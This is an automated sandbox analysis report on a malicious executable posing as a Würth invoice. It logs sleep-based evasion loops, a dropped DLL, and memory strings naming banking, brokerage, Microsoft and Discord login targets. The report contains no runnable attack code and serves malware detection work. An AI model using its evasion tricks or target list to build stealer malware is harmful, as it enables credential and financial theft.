Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 597795	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 597646	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 597527	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 597406	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 597296	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 597187	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 597078	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 596968	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 596859	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 596749	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 596640	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 596531	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 596421	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 596312	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 596202	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 596078	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 595966	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 595843	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 595733	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 595624	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 595515	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 595404	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 595296	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 595077	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 594968	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 594786	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 594475	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 594338	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 594217	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 594093	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 593968	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 593858	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Window / User API: threadDelayed 8108			Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Window / User API: threadDelayed 1727			Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsf6188.tmp\System.dll

Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe

API coverage: 1.6 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -26747778906878833s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -599874s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 5784	Thread sleep count: 8108 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 5784	Thread sleep count: 1727 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -599546s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -599436s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -599218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -598999s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -598890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -598781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -598671s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -598562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -598453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -598343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -598234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -598124s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -598015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -597906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -597795s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -597646s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -597527s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -597406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -597296s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -597187s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -597078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -596968s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -596859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -596749s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -596640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -596531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -596421s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -596312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -596202s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -596078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -595966s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -595843s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -595733s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -595624s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -595515s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -595404s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -595296s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -595187s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -595077s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -594968s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -594786s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -594475s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -594338s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -594217s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -594093s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -593968s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744	Thread sleep time: -593858s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 0_2_00406370 FindFirstFileW,FindClose,	0_2_00406370
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 0_2_0040581E GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_0040581E
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 0_2_004027FB FindFirstFileW,	0_2_004027FB
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_00406370 FindFirstFileW,FindClose,	4_2_00406370
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_0040581E DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	4_2_0040581E
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Code function: 4_2_004027FB FindFirstFileW,	4_2_004027FB

Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 599436	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 598999	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 598671	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 598124	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 597795	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 597646	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 597527	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 597406	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 597296	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 597187	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 597078	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 596968	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 596859	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 596749	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 596640	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 596531	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 596421	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 596312	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 596202	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 596078	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 595966	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 595843	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 595733	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 595624	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 595515	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 595404	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 595296	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 595077	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 594968	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 594786	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 594475	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 594338	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 594217	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 594093	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 593968	Jump to behavior
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe	Thread delayed: delay time: 593858	Jump to behavior

Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3277055717.0000000006E78000.00000004.00000020.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000002.3277055717.0000000006ED7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
